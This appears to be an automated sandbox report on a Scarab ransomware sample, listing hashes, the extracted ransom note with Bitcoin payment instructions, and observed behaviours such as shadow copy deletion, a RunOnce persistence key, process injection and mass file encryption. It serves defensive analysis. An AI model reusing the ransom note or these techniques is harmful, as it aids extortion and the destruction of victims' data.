441116d55e97124a067207bf57483dd3462bccfb034e56c4152675b0dcb118e7

Analysis

max time kernel
151s
max time network
131s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
16-03-2024 15:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Scarab.exe
Size

342KB
MD5

6899003aaa63ab4397f9e32e0a1daf43
SHA1

c22272ff0944d127992b393562871473b23ef8ea
SHA256

53f73dc2e8af9c059136029b3b535e885d4452d3375586eb9a0336d7a389aad5
SHA512

d8895f96e12d1b0b5907f7b1e7b976a37ff0cbe6db929cfbea5c931d905fb8269dc91bf44db83743920b63affc64ba88a0933d3111bc68f71ee266971b91b6bc
SSDEEP

6144:zmTLRf45/wAfqj6pjohSws+wZQtmk6LnAlnZ:eq5/tyjMLd+Rtmkc0

Score

10^/10

persistence ransomware

Malware Config

Extracted

Path

C:\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT

Ransom Note

__________________________________________________________________________________________________ | | | *** IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS *** | |__________________________________________________________________________________________________| Your files are now encrypted! -----BEGIN PERSONAL IDENTIFIER----- pAQAAAAAAABql7S+JZSHD0NADANXUd2szqKt1lDA0=tQY9Ew9SPjvJ9SvrXhlcWbmn+rfONeyZTZhcVtfdpvWexN=EdRtaVlm8vZ RVR9qp=EgLSW3SF36vlnINQRj7gr1lgpspv0wQAqhNjewqavDitURj8tL2Tte+6bSVZcay3=hgs0quEm4HiSOJca1bSnfoC9KKIY VoqoeJteuvFdmg+iih23FJhUXYCbdnn5WFNxUInJc13a=Cfi0izubUm=f2vrQA2ZWJ6YwEG46pXsXQHf4v5xPS3bFD6Dae5PR0fB jhe76xNQGZrVYvmGJOnVHPjTOqNdSPewEM0R5Pd=8nSUKLaUG8Rp=6cMPsQAwISGBdnw7dsiqXq9d8PPtWus9hGQAu0lFBOY7nCO fBaOkbadByHKREs5skZRwYj+0FIFvHqFVa=yiLzOoGw6hSHgvPYGzCJtEqDqdSydTmlYQAdlA=OQHdjrSMX6Nar1jUDOW4raYTXC og4pIBqn8VmrxSMsHUWkU=m111N4EUAIsXUcCQvq4F03nVmUTwPAvxLQKGijrAiXDUP56vc9DvuFHXobet03kh5PtG0w5Le4=BC9 uURVBcOBMgDzIsBFaq+oIQJMR1Lf4mDLMVI2tAGnPh6b+cEDe2f9G+I3xB+7Cn8IsvUPYD5NSWYWFO6QM2+Z6BnJ3sF=ki=fTb+K lJgk52EFE+EQGhPvDRO53aFaecbIQqLQNJwt0GL6GK99Z7FGuEATxIsO8RRzC9L+yYb1NARNz7bARTvc0JD5K8RaEfYQa5p+82M6 gWHIuJKfC9lvp7pdX9lcwDE4=jq8=y1hEAIjwk0 -----END PERSONAL IDENTIFIER----- All your files have been encrypted due to a security problem with your PC. Now you should send us email with your personal identifier. This email will be as confirmation you are ready to pay for decryption key. You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. Contact us using this email address: [email protected] Free decryption as guarantee! Before paying you can send us up to 3 files for free decryption. The total size of files must be less than 10Mb (non archived), and files should not contain valuable information (databases, backups, large excel sheets, etc.). __________________________________________________________________________________________________ | | | How to obtain Bitcoins? | | | | * The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click | | 'Buy bitcoins', and select the seller by payment method and price: | | https://localbitcoins.com/buy_bitcoins | | * Also you can find other places to buy Bitcoins and beginners guide here: | | http://www.coindesk.com/information/how-can-i-buy-bitcoins | | | |__________________________________________________________________________________________________| __________________________________________________________________________________________________ | | | Attention! | | | | * Do not rename encrypted files. | | * Do not try to decrypt your data using third party software, it may cause permanent data loss. | | * Decryption of your files with the help of third parties may cause increased price | | (they add their fee to our) or you can become a victim of a scam. | | | |__________________________________________________________________________________________________|

Emails

[email protected]

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (162) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Deletes itself 1 IoCs

Processes:

mshta.exe

pid process

2488 mshta.exe
Executes dropped EXE 2 IoCs

Processes:

sevnz.exesevnz.exe

pid process

2456 sevnz.exe
304 sevnz.exe
Loads dropped DLL 2 IoCs

Processes:

Scarab.exe

pid process

2716 Scarab.exe
2716 Scarab.exe

pid	process
2488	mshta.exe

pid	process
2456	sevnz.exe
304	sevnz.exe

pid	process
2716	Scarab.exe
2716	Scarab.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\{45E73A27-D16C-4EDB-ADE8-0C069E54AF30} = "C:\\Users\\Admin\\AppData\\Roaming\\sevnz.exe"	mshta.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

Scarab.exeScarab.exesevnz.exe

description	pid	process	target process
PID 2924 set thread context of 2932	2924	Scarab.exe	Scarab.exe
PID 2824 set thread context of 2716	2824	Scarab.exe	Scarab.exe
PID 2456 set thread context of 304	2456	sevnz.exe	sevnz.exe

Drops file in Program Files directory 64 IoCs

Processes:

sevnz.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin.[[email protected]].scarab	sevnz.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\weblink.api.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api	sevnz.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\EScript.api.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\APIFile_8.ico	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\eBook.api.[[email protected]].scarab	sevnz.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\APIFile_8.ico.[[email protected]].scarab	sevnz.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.CMP.[[email protected]].scarab	sevnz.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1556 vssadmin.exe

pid	process
1556	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

sevnz.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	sevnz.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	sevnz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	sevnz.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	sevnz.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	sevnz.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	sevnz.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

sevnz.exe

pid	process
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe
304	sevnz.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

Processes:

WMIC.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1800	WMIC.exe
Token: SeSecurityPrivilege	1800	WMIC.exe
Token: SeTakeOwnershipPrivilege	1800	WMIC.exe
Token: SeLoadDriverPrivilege	1800	WMIC.exe
Token: SeSystemProfilePrivilege	1800	WMIC.exe
Token: SeSystemtimePrivilege	1800	WMIC.exe
Token: SeProfSingleProcessPrivilege	1800	WMIC.exe
Token: SeIncBasePriorityPrivilege	1800	WMIC.exe
Token: SeCreatePagefilePrivilege	1800	WMIC.exe
Token: SeBackupPrivilege	1800	WMIC.exe
Token: SeRestorePrivilege	1800	WMIC.exe
Token: SeShutdownPrivilege	1800	WMIC.exe
Token: SeDebugPrivilege	1800	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1800	WMIC.exe
Token: SeRemoteShutdownPrivilege	1800	WMIC.exe
Token: SeUndockPrivilege	1800	WMIC.exe
Token: SeManageVolumePrivilege	1800	WMIC.exe
Token: 33	1800	WMIC.exe
Token: 34	1800	WMIC.exe
Token: 35	1800	WMIC.exe
Token: SeBackupPrivilege	964	vssvc.exe
Token: SeRestorePrivilege	964	vssvc.exe
Token: SeAuditPrivilege	964	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1800	WMIC.exe
